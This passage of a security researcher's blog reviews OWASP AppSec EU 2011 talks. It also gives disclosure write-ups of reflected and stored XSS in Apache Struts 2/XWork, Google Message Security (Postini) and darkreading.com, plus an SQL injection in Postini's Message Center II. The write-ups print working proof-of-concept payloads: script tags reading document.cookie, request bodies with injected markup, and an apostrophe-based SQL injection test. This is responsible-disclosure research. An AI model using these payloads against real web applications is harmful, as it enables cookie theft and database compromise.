Web applications were discussed, as well as the benefits of fuzz testing. Very well presented topic, with practical examples and testing tools.<br /><br />Giles Hogben, secure services programme manager at ENISA discussed information risks, opportunities and recommendations for smartphone security - <span style="font-weight: bold;">Current State of Application Security</span>. He also introduced the work on mobile developer guideline project done in collaboration with OWASP, as well an on-going initiative on threat analysis of app store security. Finally, security implications of HTML5 and other related standards were discussed.<br /><br />The Attack series of presentations continued with <span style="font-weight: bold;">Intranet Footprinting: Discovering resources from outside</span> presentation done by Javier Marcos De Prado and Juan Galiana Lara from IBM. Relying on exploitation of common Web applications vulnerabilities including Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) and HTTP Response Splitting, several custom modules for BeEF (Browser Exploitation Framework) were introduced. Such custom BeEF modules allow browser-based port scanning, internal DNS discovery, OS detection, etc using known approaches based on JavaScript code and CSS. An excellent presentation.<br /><br />Janne Uusilehto, head of Nokia product security started the second day of plenary sessions with a talk on software security engineering - <span style="font-weight: bold;">Software Security is about coding securely, or is that all? </span>Some key points discussed - <span style="font-style: italic;">security is a process, not a product</span> & <span style="font-style: italic;">difficulty to ensure reasonable expectations towards software security</span>. An interesting presentation.</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />The Attack series of presentations resumed with <span style="font-weight: bold;">An Introduction to OWASP Zed Attack Proxy</span> done by Simon Bennetts. A great tool for developers looking for a quick automated security assessmnet of Web applications. With his software development background, I think Simon has a good chance to make ZAP tool a worthy successor of Paros Proxy. Looking forward for ZAP updates - excellent work.<br /><br /><span style="font-weight: bold;">Testing Security Testing: Evaluating Quality of Security Testing</span> presented by Ofer Maor from Seeker Security discussed various aspects of security testing, with an emphasis on what could determine the quality of security testing - good and bad security testing.<br /><br />After this, I had a go with my own presentation <span style="font-weight: bold;">A Case Study on Enterprise E-mail (in)Security Solutions</span>. In an effort to increase the awareness on the necessity to secure enterprise anti-spam and anti-virus solutions, I briefly introduced various e-mail security solutions ranging from software, hardware/software appliances, virtual appliances and cloud-based services (SaaS and IaaS). While most of existing solutions rely on Web applications for remote administration and end-user quarantined e-mail management, exploitation of common vulnerabilities could allow internal and external attackers to gain access and maintain control to various internal resources. Various case studies on identified vulnerabilities in products/services from Google, Symantec, IBM, Barracuda Networks, Astaro and Marshal were discussed as well as some attacks which could exploiting such vulnerabilities. Finally, in the context of benchmarking enterprise e-mail security solutions, I took the opportunity to announce <a style="font-weight: bold;" href="https://www.owasp.org/index.php/OWASP_Security_Baseline_Project"><span style="color: rgb(0, 0, 102);">OWASP Security Baseline</span></a> project, as an independent way to benchmark security of various enterprise solutions (including the security ones as well).<br /><br /><span style="font-weight: bold; color: rgb(0, 0, 102);">OWASP Security Baseline call for participation is now open, drop me a line for more details and if interested to contribute: </span><span style="color: rgb(0, 0, 102); font-weight: bold;">marian dot ventuneac at owasp.org</span> </span> <span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />The next keynote was delivered by Alex Lucas, principal security develpoper manager at Microsoft - <span style="font-weight: bold;">Science, SDL & Openness</span>. A good insight into what is being done to secure various Microsoft products, including automated fuzzing and how this lead to improved product security and available materials and tools to support secure development and testing.<br /><br /><span style="font-weight: bold;">The Dark Side: Measuring and Analyzing Malicious Activity on Twitter</span> introduced the audience to recent research on analyzing and profiling suspicious/malicious Twitter accounts, lots of stats, trends, etc. Although the current percentage of malicious attacks identified by Barracuda Networks on Twitter is small (I think it was 1% of the analyzed data), such research has the potential to allow timely identification any (hopefully) prevention of any significant increases of such attacks.<br /><br />And finally, <span style="font-weight: bold;">Practical Crypto Attacks Against Web Applications</span> presented by Justin Clarke from GDS Security described practical techniques on exploiting crypto weaknesses as identified in ASP .NET framework allowing oracle padded attacks against common Web applications - an excellent presentation.<br /><br />While high expectations were for Ivan Ristic's presentation closing the AppSec EU conference, unfortunately he was not able to attend. However, Arian Evans from WhiteHat Security did a great job on reminding us once again that we (as an industry) failed on delivering the great promise on building secure software - and came with some useful suggestions. Hopefully it is not a lost battle - I believe OWASP greatly contributes to increasing awareness on application security, and OWASP AppSec EU 2011 conference proves this once again.<br /><br />Congratulations to all conference organizers, this was an excellent AppSec event! I am looking forward for the next one.<br /><br /><br /></span>Marian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.com18tag:blogger.com,1999:blog-3780447711393906495.post-48345739673453844812011-05-10T13:04:00.000-07:002011-05-18T14:57:19.166-07:00Apache Struts 2, XWork, WebWork ... Reflected XSS Vulnerabilities<span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />The recently released Apache Struts 2.2.3 framework includes fixes for two reflected XSS vulnerabilities.</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />User provided data is not</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" > properly escaped before being included in XWork generated errors, thus allowing successful reflected XSS attacks as described in <a style="font-weight: bold; color: rgb(0, 0, 102);" href="http://www.ventuneac.net/security-advisories/MVSA-11-006">MVSA-11-006</a> security advisory.</span><span style=";font-family:arial;font-size:100%;" ><span style="font-weight: bold; color: rgb(255, 0, 0);"><br /><br />NOTE: Other open source projects and commercial products relying on XWork framework could be vulnerable to attacks similar to the ones described in this post.</span></span><span style=";font-family:arial;font-size:100%;" ><span style="font-weight: bold; color: rgb(255, 0, 0);"><br /><br />NOTE: </span></span><span style="color: rgb(255, 0, 0); font-weight: bold;font-family:arial;font-size:100%;" >WebWork framework released by OpenSymphony (http://opensymphony.org) was already confirmed as vulnerable to reflected XSS attacks using similar vectors.</span><span style="font-size:100%;"> </span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><span style="font-weight: bold;"><br /><br /><br />1. XSS payload injected in the name of the requested Struts actions</span><br /><br />Preconditions:</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /></span><ul style="color: rgb(0, 0, 0);font-family:arial;"><li><span style="font-size:100%;">no declarative error handling rule is defined in struts.xml using <global-exception-mappings> tag</span></li></ul><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >Test case: </span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><br />http://test.app1.net/login%3Cimg%3E.action<br /><br /></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >HTML source code for the error displayed (HTTP response Content-Type is text/html)</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >:<span style="font-style: italic;"><br /><br />There is no Action mapped for namespace / and action name login<span style="font-weight: bold; color: rgb(255, 0, 0);"><img></span>.</span><br /><br />This allows successful reflected XSS attacks by injecting malicious scripting code into the name of requested Struts actions.<span style="font-weight: bold;"><br /><br /><br />2. Reflected XSS vulnerabilities in <s:submit> with DMI enabled</s:submit></span><br /><br />Preconditions: </span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /></span><ul style="color: rgb(0, 0, 0);font-family:arial;"><li><span style="font-size:100%;">no declarative error handling rule is defined in struts.xml using <global-exception-mappings> tag</global-exception-mappings></span></li><li><span style="font-size:100%;">Dynamic Method Invocation is enabled (this is enabled by default)</span></li><li><span style="font-size:100%;">bash syntax is used in JSP via <s:submit> tag for calling Struts actions and methods</s:submit></span></li><li><span style="font-size:100%;">the requested method is not matching an existing one already defined in the Struts action implementation class</span></li><li><span style="font-size:100%;">the requested action is not matching an existing one already defined in struts.xml</span></li></ul><span style="color: rgb(0, 0, 0);font-size:100%;" ><span style="font-family:arial;">Example of <s:submit> tag usage with JSP:</span></span><span style="font-size:100%;"><br /></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><br /><body><br />...<br /><form name="loginform" id="loginform" method="post" action=""><br />...<br /><s:submit action="login" method="cantLogin" name="cantlogin" key="cantlogin" /><br />...<br /></form><br />...<br /></body><br /></span><span style="font-size:100%;"><br /></span><span style="font-weight: bold;font-size:100%;" ><span style="color: rgb(0, 0, 0);font-family:arial;" ><br />2.1 Test case - XSS payload is injected in action attribute of </span></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><span><span style="color: rgb(0, 0, 0);font-family:arial;" ><span style="font-weight: bold;"><s:submit> </span></span></span><span style="font-weight: bold;">tag</span><br /><br />http://test.app.net/home.html?user=&password=<br />&action!login%3cscript%3ealert(document.cookie)%3c/script%3e:cantLogin=some_name<br /><br />HTML source code for the error displayed (HTTP response Content-Type is text/html):<span style="font-style: italic;"><br /><br />There is no Action mapped for namespace / and action name login<span style="font-weight: bold; color: rgb(255, 0, 0);"><script>alert(document.cookie)</script></span>.</span><br /><br />NOTE: Without proper output escaping for the invoked action (which is controlled by the user), the injected malicious scripting code is executed by the browser (the HTTP response's content-type header is set to text/html).<br /><br />This allows successful reflected XSS attacks using <s:submit> tag.<br /><br /><span style="font-weight: bold;"><br />2.2 Test case - XSS payload is injected in method attribute of </span><span style="font-weight: bold;"> <s:submit> tag</span><br /><br />http://test.app.net/home.html?user=&password=&action!login:cantLogin</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >%3cscript%3ealert(document.cookie)%3c/script%3e</span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >=some_name<br /><br /></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >HTML source code for the error displayed </span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" >(HTTP response Content-Type is text/html)<span style="font-style: italic;">:<br /><br /></span><span style="font-style: italic;"> some_path.action.LoginAction.cantLogin<span style="font-weight: bold; color: rgb(255, 0, 0);"><script>alert(document.cookie)</script></span>() </span><br /><br />NOTE: Without proper output escaping for the invoked method (which is controlled by the user), the injected scripting code will be executed by the browser (the HTTP response's content-type header is set to text/html).<br /><br />This allows successful reflected XSS attacks using <s:submit> tag.<br /><br />UPDATED (2011-05-18): The returned error also exposes internal paths for the Java class implementing the action for which we manipulate the method to be called (LoginAction in this case). </span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(255, 0, 0);"><span style="color: rgb(0, 0, 0);">This issue is documented by </span></span></span><span style="color: rgb(0, 0, 0);font-family:arial;font-size:100%;" ><a style="font-weight: bold; color: rgb(0, 0, 102);" href="http://www.ventuneac.net/security-advisories/MVSA-11-007">MVSA-11-007</a><span style="color: rgb(0, 0, 102);"> </span>security advisory.</span><span style=";font-family:arial;font-size:100%;" ><span style="color: rgb(255, 0, 0);"><span style="color: rgb(0, 0, 0);"> </span><br /><br /><span style="font-weight: bold;">WebWork framework seems to be vulnerable to similar attacks. However, since the project is not actively maintained (being replaced by Apache Struts 2), there might be an option to look into building the project from source and to include similar fixes to those suggested for XWork </span></span><b style="color: rgb(255, 0, 0); font-weight: bold;">com.opensymphony.xwork2.DefaultActionProxy</b><span style="color: rgb(255, 0, 0); font-weight: bold;"> class patched in Struts 2.2.3 (details available at </span><a style="color: rgb(255, 0, 0); font-weight: bold;" href="https://issues.apache.org/jira/browse/WW-3579">https://issues.apache.org/jira/browse/WW-3579</a><span style="color: rgb(255, 0, 0); font-weight: bold;">).</span></span><span style="font-size:100%;"><br /><br /><br /></span>Marian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.com25tag:blogger.com,1999:blog-3780447711393906495.post-72552635230512297692010-09-15T11:42:00.000-07:002010-09-15T15:07:49.522-07:00Testing Google Message Security SaaS<span style="font-size:100%;"><br /></span><span style="font-weight: bold; color: rgb(204, 0, 0);font-family:arial;font-size:100%;" >NOTE: all the vulnerabilities discussed in this article were responsible disclosed to Google back in January 2010. </span><span style="font-size:100%;"><span style="font-family:arial;"><br /><br />While driving an initiative on 'Testing the Enterprise Security Infrastructure', I've been looking sometime at the beginning of the year to assess some SaaS (Software-as-a-Service) enterprise e-mail security solutions. Thus, I came across Google Message Security (powered by Postini). Bundled with Google Apps Premiere, you can easily get your hands on the Google e-mail security services for 50$/year - a real bargain :) </span><span style="font-family:arial;"><br /><br />After setting my Google Apps Premiere account, there it was. From the Apps account, two Google Message Security services were available: the Security Console (Admin console) - used to manage the organization resources (domains, users, filtering rules, etc), and the Message Center - used by the end-user to manage the quarantined e-mails and filtering settings. The Message Center comes in two flavors: Message Center II is the latest version (set by default for end-users). However, the older user interface known as Message Center Classic was still accessible to an authenticated user (after tweaking the URL a bit).</span><span style="font-family:arial;"><br /><br />The original plan was to refresh an older security test plan I used for assessing various products from Barracuda Networks and Symantec. However, I quickly realized that I got much more that I bargained for. The Google Message Security SaaS was vulnerable to various security vulnerabilities, including multiple persistent and reflected Cross-Site Scripting (XSS), improper error handling, and the most interesting of all, SQL Injection.</span><span style="font-family:arial;"><br /><br />And here they are!</span></span><span style="font-weight: bold;font-family:arial;font-size:100%;" ><br /><br /><br />A. Multiple XSS vulnerabilities in Security Console<br /> (<a href="http://www.ventuneac.net/security-advisories/MVSA-10-002">MVSA-10-002</a>)</span><span style=";font-family:arial;font-size:100%;" ><br /><br />First, a persistent XSS vulnerability identified to affect /exec/admin_orgs resource allows injecting and persistently storing malicious scripting code via </span><span style=";font-family:arial;font-size:100%;" >setconf-neworg</span><span style=";font-family:arial;font-size:100%;" > parameter.</span><span style=";font-family:arial;font-size:85%;" ><br /><br />setconf-neworg=test%3Cimg+onmouseover%3D%22javascript%3A+alert%28document.cookie%29%22%3E</span><span style="font-size:100%;"><span style="font-family:arial;"><br /><br />The attack persisted malicious scripting code into the name of a new organization. When queried for details, the malicious scripting code successfully executed in the client's browser.</span><screenshot face="arial" 1=""><br /><br /></screenshot></span><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid-WVqgBnB_7GBFJLzoIK380P4D9kFLiPp0JHh2Kxzh7-LuPGMPX5B3o32sF264ZZCY6IRM9jxYVFTFAPYFMcv-_nBhoT4MkvYgKYY4dTs0rdxD__Irr1HZzeojjYKVTA_zpTRPwEM/s1600/GMS-XSS1.jpg"><img style="cursor: pointer; width: 400px; height: 249px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid-WVqgBnB_7GBFJLzoIK380P4D9kFLiPp0JHh2Kxzh7-LuPGMPX5B3o32sF264ZZCY6IRM9jxYVFTFAPYFMcv-_nBhoT4MkvYgKYY4dTs0rdxD__Irr1HZzeojjYKVTA_zpTRPwEM/s400/GMS-XSS1.jpg" alt="" id="BLOGGER_PHOTO_ID_5517224382995884274" border="0" /></a><br /></div><span style="font-size:100%;"><screenshot face="arial" 1=""><br />Multiple reflected XSS vulnerabilities were also identified for /exec/admin_list and /exec/admin_auth resources:<br /><br />- in ORGS and USERS > Organization<br /><span style="font-size:85%;"><br />https://ac-s200.postini.com/exec/admin_list?type=orgs&sortkeys=orgtag:h22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</span><br /><br /><span style="font-size:85%;">https://ac-s200.postini.com/exec/admin_list?type=orgs&sortkeys=orgtag:h&orgtagqs=%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</span><br />...<br /><br />- in ORGS and USERS > Users<br /><br /><span style="font-size:85%;">https://ac-s200.postini.com/exec/admin_list?type=users&childorgs=0&type_of_user=all&addressqs=&aliases=1&childorgs=1”><>&Search=Search</span><!-- iframe --><br /><br />- in ORGS and USERS > Authorization<br /><span style="font-size:85%;"><br />POST /exec/admin_auth?action=display_summary HTTP/1.1<br />Host: ac-s200.postini.com<br />...<br />redir=+List+&targetAddress=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%2Fiframe%3E&targetOrg=%5Bdomain.com%5D+Account+Administrators&currentOrg=100059875</span><br /><br />... and so on.<br /><br /><br /><span style="font-weight: bold;">B. Multiple reflected XSS in Message Center Classic<br /> (<a href="http://www.ventuneac.net/security-advisories/MVSA-10-002">MVSA-10-002</a>)</span><br /><br />Following the submission of incorrectly formatted e-mails for Approved and Blocked senders lists, injected malicious code was included in the<br /><br />invalid e-mail format error messages displayed to the user.<br /><br /><span style="font-size:85%;">POST /exec/MsgSet?action=change_MsgSettings HTTP/1.1<br />Host: mc-s200.postini.com<br />...<br />add-good_addresses=a%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Save+to+List&submit=Save+to+List</span><br /><br />The result is shown below:<br /><br /></screenshot></span><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixNDLlFUeD3OOhizCsAn6qelU3nqGipbVE40RPT6aL00FBsI2NvgSRh2BcFMA1fEDajNEFdnbFi5uA-wKmmN8xyqHZwoxyMhcbMB7bzvYdw6xDX6zxVHBPiiu1e4ofoid96lH4X8vg/s1600/GMS-XSS2.jpg"><img style="cursor: pointer; width: 400px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixNDLlFUeD3OOhizCsAn6qelU3nqGipbVE40RPT6aL00FBsI2NvgSRh2BcFMA1fEDajNEFdnbFi5uA-wKmmN8xyqHZwoxyMhcbMB7bzvYdw6xDX6zxVHBPiiu1e4ofoid96lH4X8vg/s400/GMS-XSS2.jpg" alt="" id="BLOGGER_PHOTO_ID_5517225178378302194" border="0" /></a><span style="font-size:100%;"><screenshot face="arial" 1=""></screenshot></span><br /><span style="font-size:100%;"><screenshot style="font-family: arial;" 1=""></screenshot></span></div><span style="font-size:100%;"><screenshot style="font-family: arial;" 1=""><screenshot 2=""><br /><br /><span style="font-weight: bold;">C. Reflected XSS in Message Center II<br /> (</span><a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-002">MVSA-10-002</a><span style="font-weight: bold;">)</span><br /><br />Manipulation of source_uri parameter of /msgctr/message_display resource allowed reflected XSS attacks.<br /><br /><span style="font-size:85%;">https://ac-s200.postini.com/msgctr/message_display?id=yyy&trash=trash&source_uri=%2Fapp%2Fmsgctr%2Ftrash%2 2%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</span><br /><screenshot 3=""><br /><br /><span style="font-weight: bold;">D. Improper Error Handling in Security Console<br /> (</span><a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-003">MVSA-10-003</a><span style="font-weight: bold;">)</span><br /><br />Manipulation of beg_date and end_date parameters of /exec/adminRep resource returned the following error:<br /><br /><span style="font-size:85%;">----------------------<br />There was a problem processing your request. Please click the Back button and try again.<br /><br />If you continue to see the problem, please report it to your system administrator or support contact with the following information.<br /><br /></span><span style="font-size:85%;">Time: Thu Jan 21 23:53:08 2010 GMT Request ID: 20593BC6-06E8-11DF-93DD-E3695903FD3E<br /><br />Request URL: /exec/adminRep?action=displayReport&targetorgid=100059876&cat=out_virus&report=sender&beg_date=20100120%27&end_date=20100120&org_agg=orgh<br /><br />System: ac-s200.postini.com-<br /><br /><span style="color: rgb(204, 0, 0);">Message: function(): not a valid date at /product/build/folder1/folder2/component line 137.</span></span><br />----------------<br /><br />The returned error disclosed details about the component implementing the functionality, it's location on the server, and technology being used. It could be handy for devising further attacks ;)<br /><br /><br /><span style="font-weight: bold;">E. SQL Injection in Message Center II<br /> (</span><a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-001">MVSA-10-001</a><span style="font-weight: bold;">)</span><br /><br />Manipulation of sort_direction parameter of /junk_quarantine/process and /trash/process resources allowed successful SQL Injection attacks against Message Center II service.<br /><br /><span style="font-size:85%;">POST https://mc-s200.postini.com/app/msgctr/junk_quarantine/process HTTP/1.1<br />Host: mc-s200.postini.com<br />...<br />Content-Type: multipart/form-data; boundary=---------------------------26418279386900<br />Content-Length: 1351<br />-----------------------------26418279386900<br />Content-Disposition: form-data; name="_submitted_junk_quarantine_form"<br />1<br />...<br />-----------------------------26418279386900<br />Content-Disposition: form-data; name="range_menu"<br />1-14<br />-----------------------------26418279386900<br />Content-Disposition: form-data; name="sort_menu"<br />from_asc<br />-----------------------------26418279386900<br />Content-Disposition: form-data; name="sort_direction"<br />desc'<br />-----------------------------26418279386900<br />...</span><br /><br />The extra apostrophe used for the initial test caused the following system error:<br /><br /></screenshot></screenshot></screenshot></span><div style="text-align: center;"><span style="font-size:100%;"><screenshot style="font-family: arial;" 1=""><screenshot 2=""><screenshot 3=""><screenshot 4=""></screenshot></screenshot></screenshot></screenshot></span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfyM0doz9rubaVt8p9pQNO2vdfF5bDup7TjpgecwhQ52Jk6XoZwoXGwQzl9LBahdW9vl_HenLoFEXbv5k7ms_EfxDLdi6wcRICbengXOuXnxEKARndBffGZkxY_bQJNbA4OPaFOhZq/s1600/GMS-SQL1.jpg"><img style="cursor: pointer; width: 400px; height: 269px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfyM0doz9rubaVt8p9pQNO2vdfF5bDup7TjpgecwhQ52Jk6XoZwoXGwQzl9LBahdW9vl_HenLoFEXbv5k7ms_EfxDLdi6wcRICbengXOuXnxEKARndBffGZkxY_bQJNbA4OPaFOhZq/s400/GMS-SQL1.jpg" alt="" id="BLOGGER_PHOTO_ID_5517226319376529666" border="0" /></a><span style="font-size:100%;"><screenshot style="font-family: arial;" 1=""><screenshot 2=""><screenshot 3=""><screenshot 4=""></screenshot></screenshot></screenshot></screenshot></span><br /><span style="font-size:100%;"><screenshot style="font-family: arial;" 1=""><screenshot 2=""><screenshot 3=""><screenshot 4=""></screenshot></screenshot></screenshot></screenshot></span></div><span style="font-size:100%;"><screenshot style="font-family: arial;" 1=""><screenshot 2=""><screenshot 3=""><screenshot 4=""><br />Apart of providing details on the database engine used, error type and middleware settings, the returned error confirmed the service was vulnerable to SQL Injection. Additional test cases were devised to confirm the issue.<br /><br />As confirmed by Google Security Team, such vulnerabilities were affecting Google Message Security release 6_24 (January), 6_25 (Feb), 6_26 (March) and 6_27 (April). Additional details are available in <a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-001">MVSA-10-001</a>, <a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-002">MVSA-10-002</a> and <a style="font-weight: bold;" href="http://www.ventuneac.net/security-advisories/MVSA-10-003">MVSA-10-003</a> security advisories.<br /><br />Enjoy!<br /><br /></screenshot></screenshot></screenshot></screenshot></span>Marian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.com8tag:blogger.com,1999:blog-3780447711393906495.post-76520047588200398402010-04-07T09:17:00.001-07:002010-04-07T11:53:35.463-07:00darkreading.com vulnerable to persistent XSS injected in published articles<span style="font-weight: bold;font-family:arial;" >...or 'When re-publishing app security material helps discovering vulnerabilities in the publisher's Web application'...</span><br /><br /><span style="font-family:arial;">darkreading.com published on 6th of April an article which describes 'meta-information XSS' (see 'Researcher Details New Class of Cross-Site Scripting Attack', available at http://darkreading.com/vulnerability_management/security/app-security/showArticle.jhtml?articleID=224201569").</span><br /><br /><span style="font-family:arial;">The original article included a classic XSS test case, namely <script>alert(1)</script>. As a result of an existing XSS vulnerability in the darkreading.com web site, the XSS test case above turned out to be inadvertently a successful one, as shown below:</span><br /><br /><a style="font-family: arial;" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6QKgxZP3DCaVtCD2VNqd3sbF7QmIpdnQvi-7nwyBz7A_mRa7jz0VuUbBJypupMR8NVcNAJeBGnuoZ2Zw8HZZdOxYsLxPQC-yaTfz4JYJLHUOaFMzY44q0hohu_5a_bgB8vYZ0-K0I/s1600/darkreadingXSS.jpg"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 200px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6QKgxZP3DCaVtCD2VNqd3sbF7QmIpdnQvi-7nwyBz7A_mRa7jz0VuUbBJypupMR8NVcNAJeBGnuoZ2Zw8HZZdOxYsLxPQC-yaTfz4JYJLHUOaFMzY44q0hohu_5a_bgB8vYZ0-K0I/s320/darkreadingXSS.jpg" alt="" id="BLOGGER_PHOTO_ID_5457447408275162530" border="0" /></a><br /><br /><span style="font-family:arial;">Following a brief notice I sent today to Timothy Wilson (editor at darkreading.com), he confirmed the issue, also mentioning that it is now fixed.</span><br /><br /><span style="font-family:arial;">The HTML code from the original post (including the cited XSS test case):</span><br /><span style="font-family:arial;"><span style="font-style: italic;">a DNS TXT record that contains the value "<script>alert(1)</script>" and a service</span></span><br /><br /><span style="font-family:arial;">The HTML code for current version of the article:</span><br /><span style="font-family:arial;"><span style="font-style: italic;">a DNS TXT record that contains [a certain value] and a service </span></span><br /><br /><span style="font-family:arial;">With the same article being reproduced by a significant number of online publications, it could be interesting to see how many other are also affected.</span><br /><br /><br /><h2 class="headline"><br /></h2>Marian Ventuneachttp://www.blogger.com/profile/03480456874989143556noreply@blogger.com161